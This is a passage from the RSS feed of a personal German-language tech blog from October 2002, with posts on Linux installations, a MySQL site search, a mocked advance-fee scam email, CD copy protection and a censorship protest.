  16073.    <creativeCommons:license></creativeCommons:license>
  16074.    <pubDate>Thu, 24 Oct 2002 15:23:00 +0200</pubDate>
  16075.    <category domain="">Misc</category>
  16076.    <description><![CDATA[Ich hab gerade 20% von US$ 32'000'000 als Angebot von <a href=""><b>Isa Bamaiyi</b></a>erhalten, wenn ich denn Rest via mein Konto in Sicherheit bringe. Denkste, dass ich die 80% zurückzahlen werde ;-)<br>Und das schönste daran: weil ich so gut bin, erhalte ich das Angebot von 4 anderen Isa Bamaiyis auch noch. Also 32'000'000 x 5 gibt schon ein nettes kleines Vermögen ;-)<br><br>Und wers immernoch glaubt, der schaue bitte <a href=""><b>hier</b></a>.<br><br>Nachtrag:<br>Den ganzen "Brief" kann man <a href=""><b>hier</b></a> finden.
  16077. ]]></description>
  16078.    <content:encoded><![CDATA[Ich hab gerade 20% von US$ 32'000'000 als Angebot von <a href=""><b>Isa Bamaiyi</b></a>erhalten, wenn ich denn Rest via mein Konto in Sicherheit bringe. Denkste, dass ich die 80% zurückzahlen werde ;-)<br>Und das schönste daran: weil ich so gut bin, erhalte ich das Angebot von 4 anderen Isa Bamaiyis auch noch. Also 32'000'000 x 5 gibt schon ein nettes kleines Vermögen ;-)<br><br>Und wers immernoch glaubt, der schaue bitte <a href=""><b>hier</b></a>.<br><br>Nachtrag:<br>Den ganzen "Brief" kann man <a href=""><b>hier</b></a> finden.
  16079. ]]></content:encoded>
  16080.  </item>
  16082.  <item>
  16083.    <title>Kopierschutz</title>
  16084.    <link></link>
  16085.    <guid isPermaLink="true"></guid>
  16086.    <dc:creator>Andreas Jaggi</dc:creator>
  16087.    <creativeCommons:license></creativeCommons:license>
  16088.    <pubDate>Thu, 24 Oct 2002 13:47:00 +0200</pubDate>
  16089.    <category domain="">Misc</category>
  16090.    <description><![CDATA[<a href=""><b>raphb</b></a> hat einen interessanten/amüsanten Text in seinem Weblog veröffentlicht ;-)<br><br><a href=""><i>"[...] Was soll ich in Zukunft tun ? Einen CD-Brenner und ein Crackprogramm beschaffen,
  16091. das den Kopierschutz ignoriert ? Dateien grundsaetzlich aus dem Netz ziehen ?
  16092. Den Minidisk-Recorder an den Kopfhoererausgang im Plattenladen anschliessen ?
  16093. Neue Scheiben nicht mehr kaufen, alte dafuer kopieren ? Das Radioprogramm auf
  16094. Festplatte mitschneiden lassen und hinterher sortieren ? Was auch immer ich
  16095. davon waehle, Plattenfirmen und Kuenstler werden mich als zahlenden Kunden
  16096. verlieren. [...]"</i></a>
  16097. ]]></description>
  16098.    <content:encoded><![CDATA[<a href=""><b>raphb</b></a> hat einen interessanten/amüsanten Text in seinem Weblog veröffentlicht ;-)<br><br><a href=""><i>"[...] Was soll ich in Zukunft tun ? Einen CD-Brenner und ein Crackprogramm beschaffen,
  16099. das den Kopierschutz ignoriert ? Dateien grundsaetzlich aus dem Netz ziehen ?
  16100. Den Minidisk-Recorder an den Kopfhoererausgang im Plattenladen anschliessen ?
  16101. Neue Scheiben nicht mehr kaufen, alte dafuer kopieren ? Das Radioprogramm auf
  16102. Festplatte mitschneiden lassen und hinterher sortieren ? Was auch immer ich
  16103. davon waehle, Plattenfirmen und Kuenstler werden mich als zahlenden Kunden
  16104. verlieren. [...]"</i></a>
  16105. ]]></content:encoded>
  16106.  </item>
  16108.  <item>
  16109.    <title>Monster</title>
  16110.    <link></link>
  16111.    <guid isPermaLink="true"></guid>
  16112.    <dc:creator>Andreas Jaggi</dc:creator>
  16113.    <creativeCommons:license></creativeCommons:license>
  16114.    <pubDate>Thu, 24 Oct 2002 00:21:00 +0200</pubDate>
  16115.    <category domain="">School</category>
  16116.    <description><![CDATA[Wie soll man an der Maturaprüfung in 3 Stunden einen Aufsatz schreiben, wenn man jetzt 1.5 Stunden in der Schule braucht, um nur die Überschrift zu schreiben?!<br>Wer schon einen Aufsatz zum Thema Monster geschrieben hat, darf ihn mir auch mailen ;-)
  16117. ]]></description>
  16118.    <content:encoded><![CDATA[Wie soll man an der Maturaprüfung in 3 Stunden einen Aufsatz schreiben, wenn man jetzt 1.5 Stunden in der Schule braucht, um nur die Überschrift zu schreiben?!<br>Wer schon einen Aufsatz zum Thema Monster geschrieben hat, darf ihn mir auch mailen ;-)
  16119. ]]></content:encoded>
  16120.  </item>
  16122.  <item>
  16123.    <title>Momentan im Ohr</title>
  16124.    <link></link>
  16125.    <guid isPermaLink="true"></guid>
  16126.    <dc:creator>Andreas Jaggi</dc:creator>
  16127.    <creativeCommons:license></creativeCommons:license>
  16128.    <pubDate>Wed, 23 Oct 2002 05:29:00 +0200</pubDate>
  16129.    <category domain="">Music</category>
  16130.    <description><![CDATA[<a href=""><b>Attaque 77 - Dame Fuego</b></a>
  16131. ]]></description>
  16132.    <content:encoded><![CDATA[<a href=""><b>Attaque 77 - Dame Fuego</b></a>
  16133. ]]></content:encoded>
  16134.  </item>
  16136.  <item>
  16137.    <title>Rätselt!</title>
  16138.    <link></link>
  16139.    <guid isPermaLink="true"></guid>
  16140.    <dc:creator>Andreas Jaggi</dc:creator>
  16141.    <creativeCommons:license></creativeCommons:license>
  16142.    <pubDate>Sun, 20 Oct 2002 19:09:00 +0200</pubDate>
  16143.    <category domain="">Coding</category>
  16144.    <description><![CDATA[Das mit dem GET und dem POST hat übrigens auch etwas mit dem google zu tun.<br>Jetzt sollt's eigentlich Klick machen ;-)
  16145. ]]></description>
  16146.    <content:encoded><![CDATA[Das mit dem GET und dem POST hat übrigens auch etwas mit dem google zu tun.<br>Jetzt sollt's eigentlich Klick machen ;-)
  16147. ]]></content:encoded>
  16148.  </item>
  16150.  <item>
  16151.    <title>MySQL Full-text Search</title>
  16152.    <link></link>
  16153.    <guid isPermaLink="true"></guid>
  16154.    <dc:creator>Andreas Jaggi</dc:creator>
  16155.    <creativeCommons:license></creativeCommons:license>
  16156.    <pubDate>Sun, 20 Oct 2002 17:18:00 +0200</pubDate>
  16157.    <category domain="">Coding</category>
  16158.    <description><![CDATA[... will nicht wie ich!<br>Nach <a href=""><b>diesem</b></a> Tipp von <a href=""><b>rw</b></a> habe ich meine Suchfunktion noch einmal neu gebaut. Durfte jedoch feststellen, dass dabei keine Wörter mit weniger als 4 Zeichen funktionieren und dass nur Wörter verglichen werden, jedoch nicht Wortteile.<br>Also hab ich wieder zurückgewechselt und die MySQL-Queries noch länger gemacht, damit jetzt auch die Titel der einzelnen Beiträge durchsucht werden.
  16159. ]]></description>
  16160.    <content:encoded><![CDATA[... will nicht wie ich!<br>Nach <a href=""><b>diesem</b></a> Tipp von <a href=""><b>rw</b></a> habe ich meine Suchfunktion noch einmal neu gebaut. Durfte jedoch feststellen, dass dabei keine Wörter mit weniger als 4 Zeichen funktionieren und dass nur Wörter verglichen werden, jedoch nicht Wortteile.<br>Also hab ich wieder zurückgewechselt und die MySQL-Queries noch länger gemacht, damit jetzt auch die Titel der einzelnen Beiträge durchsucht werden.
  16161. ]]></content:encoded>
  16162.  </item>
  16164.  <item>
  16165.    <title>Tüftel, tüftel</title>
  16166.    <link></link>
  16167.    <guid isPermaLink="true"></guid>
  16168.    <dc:creator>Andreas Jaggi</dc:creator>
  16169.    <creativeCommons:license></creativeCommons:license>
  16170.    <pubDate>Sun, 20 Oct 2002 02:22:00 +0200</pubDate>
  16171.    <category domain="">Coding</category>
  16172.    <description><![CDATA[Nun werden die Suchergebnisse nach Häufigkeit der Treffer sortiert, sowie doppelte Treffer entfernt.<br>Diese 25 Zeilen Code, an denen ich jetzt sicher 1.5 Stunden gebaut habe, kann man für 10 Euro käuflich erwerben; damit ich den Kaffee bezahlen kann ;-)
  16173. ]]></description>
  16174.    <content:encoded><![CDATA[Nun werden die Suchergebnisse nach Häufigkeit der Treffer sortiert, sowie doppelte Treffer entfernt.<br>Diese 25 Zeilen Code, an denen ich jetzt sicher 1.5 Stunden gebaut habe, kann man für 10 Euro käuflich erwerben; damit ich den Kaffee bezahlen kann ;-)
  16175. ]]></content:encoded>
  16176.  </item>
  16178.  <item>
  16179.    <title>Sucht!</title>
  16180.    <link></link>
  16181.    <guid isPermaLink="true"></guid>
  16182.    <dc:creator>Andreas Jaggi</dc:creator>
  16183.    <creativeCommons:license></creativeCommons:license>
  16184.    <pubDate>Sun, 20 Oct 2002 00:42:00 +0200</pubDate>
  16185.    <category domain="">Coding</category>
  16186.    <description><![CDATA[Damit ihr's noch bequemer habt, gibt es jetzt ne Suchfunktion.<br>Warum das ganze via GET und nicht via POST funktioniert, erfährt ihr später noch. Wer's trotzdem rauskriegt, darf sich Geek nennen ;-]
  16187. ]]></description>
  16188.    <content:encoded><![CDATA[Damit ihr's noch bequemer habt, gibt es jetzt ne Suchfunktion.<br>Warum das ganze via GET und nicht via POST funktioniert, erfährt ihr später noch. Wer's trotzdem rauskriegt, darf sich Geek nennen ;-]
  16189. ]]></content:encoded>
  16190.  </item>
  16192.  <item>
  16193.    <title>Winterswap</title>
  16194.    <link></link>
  16195.    <guid isPermaLink="true"></guid>
  16196.    <dc:creator>Andreas Jaggi</dc:creator>
  16197.    <creativeCommons:license></creativeCommons:license>
  16198.    <pubDate>Sat, 19 Oct 2002 16:41:00 +0200</pubDate>
  16199.    <category domain="">Misc</category>
  16200.    <description><![CDATA[<a href=""><b>Da</b></a> bin ich natürlich dabei :-)
  16201. ]]></description>
  16202.    <content:encoded><![CDATA[<a href=""><b>Da</b></a> bin ich natürlich dabei :-)
  16203. ]]></content:encoded>
  16204.  </item>
  16206.  <item>
  16207.    <title>Gegen Zensur!</title>
  16208.    <link></link>
  16209.    <guid isPermaLink="true"></guid>
  16210.    <dc:creator>Andreas Jaggi</dc:creator>
  16211.    <creativeCommons:license></creativeCommons:license>
  16212.    <pubDate>Sat, 19 Oct 2002 02:53:00 +0200</pubDate>
  16213.    <category domain="">Misc</category>
  16214.    <description><![CDATA[<a href="" target="_blank"><b>Dieses Antifa-Plakat</b></a> wird von der Berliner Polizei zensiert. Bisher wurden schon verschiedene Websites abgemahnt, unter anderem <a href=""><b></b></a>, <a href=""><b>Linke Seite</b></a>, <a href=""><b>Jusos Steglitz/Zehlendorf</b></a>.<br>Der Berliner Polizei fehlt nicht nur jegliche Rechtsgrundlage dazu (eine richterliche Verfügung ist meines Wissens nicht vorhanden!), sondern sie verstösst damit auch gegen das <a href=""><b>Grundgesetz der BRD</b></a>!<br><br><a href=""><b>Die Berliner Polizei verstösst damit auch gegen Artikel 10 (Freiheit der Meinungsäusserung) der Menschenrechte!</b></a><br><br>Stoppt die Zensur! Kopiert die Plakate und verteilt sie im ganzen Internet!<br><br>Politische Hintergründe und weitere Informationen zu der Sache gibts <a href=";name=News&amp;file=article&amp;sid=53&amp;mode=thread&amp;order=0&amp;thold=0"><b>hier</b></a>, <a href=""><b>hier</b></a> und beim <a href=""><b>Schockwellenreiter</b></a>.<br><br><br><a href=""><img alt="Antifaplakat" src="" height="291" width="200"></a>
  16215. ]]></description>
  16216.    <content:encoded><![CDATA[<a href="" target="_blank"><b>Dieses Antifa-Plakat</b></a> wird von der Berliner Polizei zensiert. Bisher wurden schon verschiedene Websites abgemahnt, unter anderem <a href=""><b></b></a>, <a href=""><b>Linke Seite</b></a>, <a href=""><b>Jusos Steglitz/Zehlendorf</b></a>.<br>Der Berliner Polizei fehlt nicht nur jegliche Rechtsgrundlage dazu (eine richterliche Verfügung ist meines Wissens nicht vorhanden!), sondern sie verstösst damit auch gegen das <a href=""><b>Grundgesetz der BRD</b></a>!<br><br><a href=""><b>Die Berliner Polizei verstösst damit auch gegen Artikel 10 (Freiheit der Meinungsäusserung) der Menschenrechte!</b></a><br><br>Stoppt die Zensur! Kopiert die Plakate und verteilt sie im ganzen Internet!<br><br>Politische Hintergründe und weitere Informationen zu der Sache gibts <a href=";name=News&amp;file=article&amp;sid=53&amp;mode=thread&amp;order=0&amp;thold=0"><b>hier</b></a>, <a href=""><b>hier</b></a> und beim <a href=""><b>Schockwellenreiter</b></a>.<br><br><br><a href=""><img alt="Antifaplakat" src="" height="291" width="200"></a>
  16217. ]]></content:encoded>
  16218.  </item>
  16220.  <item>
  16221.    <title>Muss das sein?</title>
  16222.    <link></link>
  16223.    <guid isPermaLink="true"></guid>
  16224.    <dc:creator>Andreas Jaggi</dc:creator>
  16225.    <creativeCommons:license></creativeCommons:license>
  16226.    <pubDate>Fri, 18 Oct 2002 17:57:00 +0200</pubDate>
  16227.    <category domain="">Misc</category>
  16228.    <description><![CDATA[Ist den wirklich <a href=""><b>so viel</b></a> Zeichensalat nötig nur um das hier darzustellen?<br><br><div style="background-color: #FFFBF0;">-----Ursprüngliche Nachricht-----<br><b>Von:</b> Eberhard Mirjam [] <br><b>Gesendet:</b> Freitag, 18. Oktober 2002 13:24<br><b>An:</b> Linder Julia;;;;;<br><b>Betreff:</b> Verhalten bei Notsituation<br><br><br><br><pre>... richtiges Verhalten bei plötzlichem Auftreten von Arbeit ...</pre><img alt="Maus" src="" width="121" height="78"></div><br><br>Nachtrag:<br>Die Daten des Bildes sind da natürlich noch nicht dabei!
  16229. ]]></description>
  16230.    <content:encoded><![CDATA[Ist den wirklich <a href=""><b>so viel</b></a> Zeichensalat nötig nur um das hier darzustellen?<br><br><div style="background-color: #FFFBF0;">-----Ursprüngliche Nachricht-----<br><b>Von:</b> Eberhard Mirjam [] <br><b>Gesendet:</b> Freitag, 18. Oktober 2002 13:24<br><b>An:</b> Linder Julia;;;;;<br><b>Betreff:</b> Verhalten bei Notsituation<br><br><br><br><pre>... richtiges Verhalten bei plötzlichem Auftreten von Arbeit ...</pre><img alt="Maus" src="" width="121" height="78"></div><br><br>Nachtrag:<br>Die Daten des Bildes sind da natürlich noch nicht dabei!
  16231. ]]></content:encoded>
  16232.  </item>
  16234.  <item>
  16235.    <title>So nebenbei</title>
  16236.    <link></link>
  16237.    <guid isPermaLink="true"></guid>
  16238.    <dc:creator>Andreas Jaggi</dc:creator>
  16239.    <creativeCommons:license></creativeCommons:license>
  16240.    <pubDate>Thu, 17 Oct 2002 23:50:00 +0200</pubDate>
  16241.    <category domain="">Linux</category>
  16242.    <description><![CDATA[Quake3 und RTCW laufen übrigens bei mir nun auch auf Linux.
  16243. ]]></description>
  16244.    <content:encoded><![CDATA[Quake3 und RTCW laufen übrigens bei mir nun auch auf Linux.
  16245. ]]></content:encoded>
  16246.  </item>
  16248.  <item>
  16249.    <title>Ha!</title>
  16250.    <link></link>
  16251.    <guid isPermaLink="true"></guid>
  16252.    <dc:creator>Andreas Jaggi</dc:creator>
  16253.    <creativeCommons:license></creativeCommons:license>
  16254.    <pubDate>Thu, 17 Oct 2002 13:10:00 +0200</pubDate>
  16255.    <category domain="">Linux</category>
  16256.    <description><![CDATA[UT läuft nun auch unter Linux!
  16257. ]]></description>
  16258.    <content:encoded><![CDATA[UT läuft nun auch unter Linux!
  16259. ]]></content:encoded>
  16260.  </item>
  16262.  <item>
  16263.    <title>Gaming Tux</title>
  16264.    <link></link>
  16265.    <guid isPermaLink="true"></guid>
  16266.    <dc:creator>Andreas Jaggi</dc:creator>
  16267.    <creativeCommons:license></creativeCommons:license>
  16268.    <pubDate>Wed, 16 Oct 2002 16:43:00 +0200</pubDate>
  16269.    <category domain="">Linux</category>
  16270.    <description><![CDATA[<a href=""><b>Hier</b></a> findet man viele Informationen, über Games unter Linux. Leider noch nichts zu UT2003.
  16271. ]]></description>
  16272.    <content:encoded><![CDATA[<a href=""><b>Hier</b></a> findet man viele Informationen, über Games unter Linux. Leider noch nichts zu UT2003.
  16273. ]]></content:encoded>
  16274.  </item>
  16276.  <item>
  16277.    <title>Hahaha</title>
  16278.    <link></link>
  16279.    <guid isPermaLink="true"></guid>
  16280.    <dc:creator>Andreas Jaggi</dc:creator>
  16281.    <creativeCommons:license></creativeCommons:license>
  16282.    <pubDate>Wed, 16 Oct 2002 01:35:00 +0200</pubDate>
  16283.    <category domain="">Misc</category>
  16284.    <description><![CDATA[<a href=""><b>NucleoSTOP</b></a>, ein kompaktes Gerät, das es in sich hat. Durch ein innovatives Verfahren wird Atomstrom sofort erkannt, und, bevor er Ihre wertvollen Elektrogeräte durchflutet, zurück zum Erzeuger geschickt.<br>Der Preis beträgt nur noch sensationelle 949,- Euro incl. MwSt.<br><br>Quelle: <a href=""><b></b></a>
  16285. ]]></description>
  16286.    <content:encoded><![CDATA[<a href=""><b>NucleoSTOP</b></a>, ein kompaktes Gerät, das es in sich hat. Durch ein innovatives Verfahren wird Atomstrom sofort erkannt, und, bevor er Ihre wertvollen Elektrogeräte durchflutet, zurück zum Erzeuger geschickt.<br>Der Preis beträgt nur noch sensationelle 949,- Euro incl. MwSt.<br><br>Quelle: <a href=""><b></b></a>
  16287. ]]></content:encoded>
  16288.  </item>
  16290.  <item>
  16291.    <title>Und ich sprach, es werde graphisch und es ward graphisch.</title>
  16292.    <link></link>
  16293.    <guid isPermaLink="true"></guid>
  16294.    <dc:creator>Andreas Jaggi</dc:creator>
  16295.    <creativeCommons:license></creativeCommons:license>
  16296.    <pubDate>Sun, 13 Oct 2002 11:10:00 +0200</pubDate>
  16297.    <category domain="">Linux</category>
  16298.    <description><![CDATA[X und Gnome laufen. Der Rest auch. <a href=""><b>Der Fehler mit dem Netzwerk</b></a> kam wegen eines nichteingesteckten Netzwerkkabels ...
  16299. ]]></description>
  16300.    <content:encoded><![CDATA[X und Gnome laufen. Der Rest auch. <a href=""><b>Der Fehler mit dem Netzwerk</b></a> kam wegen eines nichteingesteckten Netzwerkkabels ...
  16301. ]]></content:encoded>
  16302.  </item>
  16304.  <item>
  16305.    <title>Ich verkaufe resp. versteigere</title>
  16306.    <link></link>
  16307.    <guid isPermaLink="true"></guid>
  16308.    <dc:creator>Andreas Jaggi</dc:creator>
  16309.    <creativeCommons:license></creativeCommons:license>
  16310.    <pubDate>Sat, 12 Oct 2002 16:15:00 +0200</pubDate>
  16311.    <category domain="">Misc</category>
  16312.    <description><![CDATA[<a href="#" class="gone"><b>Hier</b></a> versteigere ich 20 Internet-World Ausgaben inklusive CDs.<br>Ein idealer Einstieg ins Internet. Vermittelt Inhalte über Webdesign, Webprogrammierung (HTML, CSS, Javascript...), Internet Hard- und Software. Behandelt auch komplexere Themen wie PHP, ASP, Perl ...<br><br><b>Bietet mit und treibt den Preis in die Höhe ;-)</b>
  16313. ]]></description>
  16314.    <content:encoded><![CDATA[<a href="#" class="gone"><b>Hier</b></a> versteigere ich 20 Internet-World Ausgaben inklusive CDs.<br>Ein idealer Einstieg ins Internet. Vermittelt Inhalte über Webdesign, Webprogrammierung (HTML, CSS, Javascript...), Internet Hard- und Software. Behandelt auch komplexere Themen wie PHP, ASP, Perl ...<br><br><b>Bietet mit und treibt den Preis in die Höhe ;-)</b>
  16315. ]]></content:encoded>
  16316.  </item>
  16318.  <item>
  16319.    <title>Es geht wieder :-)</title>
  16320.    <link></link>
  16321.    <guid isPermaLink="true"></guid>
  16322.    <dc:creator>Andreas Jaggi</dc:creator>
  16323.    <creativeCommons:license></creativeCommons:license>
  16324.    <pubDate>Sat, 12 Oct 2002 01:24:00 +0200</pubDate>
  16325.    <category domain="">Linux</category>
  16326.    <description><![CDATA[Hab Gentoo noch einaml ganz neu installiert.
  16327. Jedoch hab ich die CFLAGS etwas geändert:<br><br>Vorher:<br><br>
  16328. CFLAGS="-march=athlon-tbird"
  16329. <br><br>
  16330. Nachher:
  16331. <br><br>
  16332. CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer -mmmx -m3dnow -funroll-loops -frerun-cse-after-loop -falign-functions=4 -expensive-optimizations"
  16333. <br><br>
  16334. Daher ist diesmal auch kein Fehler beim kompilieren aufgetreten. Und: das kompilieren ging viel schneller.<br>Insgesamt (bootstrap &amp; system) hab ich an die 2 Stunden Zeit gespart!<br><br>Jedoch will jetzt das Netzwerk nicht mehr. Aber das wird wohl nicht so ein grosses Problem zum beheben sein...
  16335. ]]></description>
  16336.    <content:encoded><![CDATA[Hab Gentoo noch einaml ganz neu installiert.
  16337. Jedoch hab ich die CFLAGS etwas geändert:<br><br>Vorher:<br><br>
  16338. CFLAGS="-march=athlon-tbird"
  16339. <br><br>
  16340. Nachher:
  16341. <br><br>
  16342. CFLAGS="-march=athlon-tbird -O3 -pipe -fomit-frame-pointer -mmmx -m3dnow -funroll-loops -frerun-cse-after-loop -falign-functions=4 -expensive-optimizations"
  16343. <br><br>
  16344. Daher ist diesmal auch kein Fehler beim kompilieren aufgetreten. Und: das kompilieren ging viel schneller.<br>Insgesamt (bootstrap &amp; system) hab ich an die 2 Stunden Zeit gespart!<br><br>Jedoch will jetzt das Netzwerk nicht mehr. Aber das wird wohl nicht so ein grosses Problem zum beheben sein...
  16345. ]]></content:encoded>
  16346.  </item>
  16348.  <item>
  16349.    <title>Dummes blödes Gentoo</title>
  16350.    <link></link>
  16351.    <guid isPermaLink="true"></guid>
  16352.    <dc:creator>Andreas Jaggi</dc:creator>
  16353.    <creativeCommons:license></creativeCommons:license>
  16354.    <pubDate>Fri, 11 Oct 2002 13:34:00 +0200</pubDate>
  16355.    <category domain="">Linux</category>
  16356.    <description><![CDATA[Beim kompilieren des Systems (emerge system) kommt folgender Fehler bei der Installation von iptables 1.2.7a<pre>
  16357. !!! ERROR: The ebuild did not complete successfully.
  16358. !!! Function src_compile, Line 12, Exitcode 2
  16359. !!! (no error message)
  16360. </pre>
  16361. Kann mir mal einer sagen, weshalb das nicht gehen will, wo ich doch die aktuellen Sourcen habe.<pre>emerge sync</pre> hat auch nichts geholfen.
  16362. ]]></description>
  16363.    <content:encoded><![CDATA[Beim kompilieren des Systems (emerge system) kommt folgender Fehler bei der Installation von iptables 1.2.7a<pre>
  16364. !!! ERROR: The ebuild did not complete successfully.
  16365. !!! Function src_compile, Line 12, Exitcode 2
  16366. !!! (no error message)
  16367. </pre>
  16368. Kann mir mal einer sagen, weshalb das nicht gehen will, wo ich doch die aktuellen Sourcen habe.<pre>emerge sync</pre> hat auch nichts geholfen.
  16369. ]]></content:encoded>
  16370.  </item>
  16372.  <item>
  16373.    <title>Dualboot ist out! Es lebe Trialboot!</title>
  16374.    <link></link>
  16375.    <guid isPermaLink="true"></guid>
  16376.    <dc:creator>Andreas Jaggi</dc:creator>
  16377.    <creativeCommons:license></creativeCommons:license>
  16378.    <pubDate>Fri, 11 Oct 2002 01:52:00 +0200</pubDate>
  16379.    <category domain="">Linux</category>
  16380.    <description><![CDATA[Mit diesem Motto hab ich heute tatkräftig meine HD noch einmal (fast) neu partitionniert. Meine Redhat-Partition musste dran glauben. Nur Windows blieb, weils mir zu aufwendig ist alles neu zu installieren.<br>Seither hab ich folgende Partitionstabelle:<br><pre>
  16381. /dev/hda1  ntfs    w2k-system
  16382. /dev/hda5  ntfs    w2k-programme
  16383. /dev/hda6  fat32   w2k-games
  16384. /dev/hda7  fat32   www
  16385. /dev/hda8  ext2/3  /boot gentoo
  16386. /dev/hda9  ext2/3  /     debian
  16387. /dev/hda10 ext2/3  /usr  debian
  16388. /dev/hda11 ext2/3  /var  debian
  16389. /dev/hda12 ext2/3  /tmp  debian
  16390. /dev/hda13 ext2/3  /     gentoo
  16391. /dev/hda14 ext2/3  /home
  16392. /dev/hda15 swap    swap
  16393. /dev/hda16 fat32   backup www
  16394. /dev/hda17 fat32   backup eigene dateien
  16395. /dev/hda18 fat32   eigene dateien
  16396. /dev/hda19 fat32   media
  16397. </pre><br>Nun ja, Debian läuft. Ausser dem X Zeugs. Bricht immer ab mit: No Screen(s) found. Und meldet noch, dass der Screen falsch komfiguriert sei. Dabei hab ich doch alles so eingegebn wies auf Verpackungen, Manuals etc. steht. *nerv*<br>Gentoo ist jetzt gerade beim Bootstrap, was soviel heisst wie: Kompilierer mit dem Kompilierer der CD kompilieren und nachdem glibc kompiliert ist nocheinmal den Kompilierer kompilieren, diesmal aber mit dem kompilierten Kompilierer. Einfach oder? ;-)
  16398. ]]></description>
  16399.    <content:encoded><![CDATA[Mit diesem Motto hab ich heute tatkräftig meine HD noch einmal (fast) neu partitionniert. Meine Redhat-Partition musste dran glauben. Nur Windows blieb, weils mir zu aufwendig ist alles neu zu installieren.<br>Seither hab ich folgende Partitionstabelle:<br><pre>
  16400. /dev/hda1  ntfs    w2k-system
  16401. /dev/hda5  ntfs    w2k-programme
  16402. /dev/hda6  fat32   w2k-games
  16403. /dev/hda7  fat32   www
  16404. /dev/hda8  ext2/3  /boot gentoo
  16405. /dev/hda9  ext2/3  /     debian
  16406. /dev/hda10 ext2/3  /usr  debian
  16407. /dev/hda11 ext2/3  /var  debian
  16408. /dev/hda12 ext2/3  /tmp  debian
  16409. /dev/hda13 ext2/3  /     gentoo
  16410. /dev/hda14 ext2/3  /home
  16411. /dev/hda15 swap    swap
  16412. /dev/hda16 fat32   backup www
  16413. /dev/hda17 fat32   backup eigene dateien
  16414. /dev/hda18 fat32   eigene dateien
  16415. /dev/hda19 fat32   media
  16416. </pre><br>Nun ja, Debian läuft. Ausser dem X Zeugs. Bricht immer ab mit: No Screen(s) found. Und meldet noch, dass der Screen falsch komfiguriert sei. Dabei hab ich doch alles so eingegebn wies auf Verpackungen, Manuals etc. steht. *nerv*<br>Gentoo ist jetzt gerade beim Bootstrap, was soviel heisst wie: Kompilierer mit dem Kompilierer der CD kompilieren und nachdem glibc kompiliert ist nocheinmal den Kompilierer kompilieren, diesmal aber mit dem kompilierten Kompilierer. Einfach oder? ;-)
  16417. ]]></content:encoded>
  16418.  </item>
  16420.  <item>
  16421.    <title>Ehre wem Ehre gebührt</title>
  16422.    <link></link>
  16423.    <guid isPermaLink="true"></guid>
  16424.    <dc:creator>Andreas Jaggi</dc:creator>
  16425.    <creativeCommons:license></creativeCommons:license>
  16426.    <pubDate>Wed, 09 Oct 2002 01:18:00 +0200</pubDate>
  16427.    <category domain="">Misc</category>
  16428.    <description><![CDATA[Hab's gar nicht gemerkt: Meinen <a href=""><b>100. Eintrag</b></a> hab ich einem Microsoft Fehler gewidmet. Schande über mich ;-)
  16429. ]]></description>
  16430.    <content:encoded><![CDATA[Hab's gar nicht gemerkt: Meinen <a href=""><b>100. Eintrag</b></a> hab ich einem Microsoft Fehler gewidmet. Schande über mich ;-)
  16431. ]]></content:encoded>
  16432.  </item>
  16434.  <item>
  16435.    <title>Grub it!</title>
  16436.    <link></link>
  16437.    <guid isPermaLink="true"></guid>
  16438.    <dc:creator>Andreas Jaggi</dc:creator>
  16439.    <creativeCommons:license></creativeCommons:license>
  16440.    <pubDate>Wed, 09 Oct 2002 01:12:00 +0200</pubDate>
  16441.    <category domain="">Linux</category>
  16442.    <description><![CDATA[Ha! Red Hat 8.0 läuft noch.<br>Hab schon mal mit dem personalisieren begonnen. Mein erstes Opfer: der GRUB Bootloader.<br><a href=""><b>So</b></a> ungefähr sieht er jetzt aus (Bootmenu etc. fehlt); und <a href=""><b>so</b></a> sollte er eigentlich aussehen (ohne die Beschränkung auf 16 Farben).<br>Als nächstes kommt der graphische Login. Oder vielleicht mach ich noch einen Versuch mit Debian. Red Hat passt mir nicht so, ist mir etwas zu "aufdringlich".
  16443. ]]></description>
  16444.    <content:encoded><![CDATA[Ha! Red Hat 8.0 läuft noch.<br>Hab schon mal mit dem personalisieren begonnen. Mein erstes Opfer: der GRUB Bootloader.<br><a href=""><b>So</b></a> ungefähr sieht er jetzt aus (Bootmenu etc. fehlt); und <a href=""><b>so</b></a> sollte er eigentlich aussehen (ohne die Beschränkung auf 16 Farben).<br>Als nächstes kommt der graphische Login. Oder vielleicht mach ich noch einen Versuch mit Debian. Red Hat passt mir nicht so, ist mir etwas zu "aufdringlich".
  16445. ]]></content:encoded>
  16446.  </item>
  16448.  <item>
  16449.    <title>Ätsch!</title>
  16450.    <link></link>
  16451.    <guid isPermaLink="true"></guid>
  16452.    <dc:creator>Andreas Jaggi</dc:creator>
  16453.    <creativeCommons:license></creativeCommons:license>
  16454.    <pubDate>Tue, 08 Oct 2002 03:29:00 +0200</pubDate>
  16455.    <category domain="">Misc</category>
  16456.    <description><![CDATA[<pre>Microsoft OLE DB Provider for ODBC Drivers- Fehler '8007000e'
  16458. [Microsoft][ODBC Microsoft Access Driver] Nicht genügend Arbeitsspeicher.
  16460. /leftinc.asp, line 30</pre>
  16461. Gerade bei <a href=""><b>Steg PC</b></a> entdeckt. <br>BTW: Hab jetzt Red Had Linux 8.0 am Laufen; damit sollte kein solcher Fehler passieren ;-)
  16462. ]]></description>
  16463.    <content:encoded><![CDATA[<pre>Microsoft OLE DB Provider for ODBC Drivers- Fehler '8007000e'
  16465. [Microsoft][ODBC Microsoft Access Driver] Nicht genügend Arbeitsspeicher.
  16467. /leftinc.asp, line 30</pre>
  16468. Gerade bei <a href=""><b>Steg PC</b></a> entdeckt. <br>BTW: Hab jetzt Red Had Linux 8.0 am Laufen; damit sollte kein solcher Fehler passieren ;-)
  16469. ]]></content:encoded>
  16470.  </item>
  16472.  <item>
  16473.    <title>Bastel bastel</title>
  16474.    <link></link>
  16475.    <guid isPermaLink="true"></guid>
  16476.    <dc:creator>Andreas Jaggi</dc:creator>
  16477.    <creativeCommons:license></creativeCommons:license>
  16478.    <pubDate>Mon, 07 Oct 2002 03:02:00 +0200</pubDate>
  16479.    <category domain="">Linux</category>
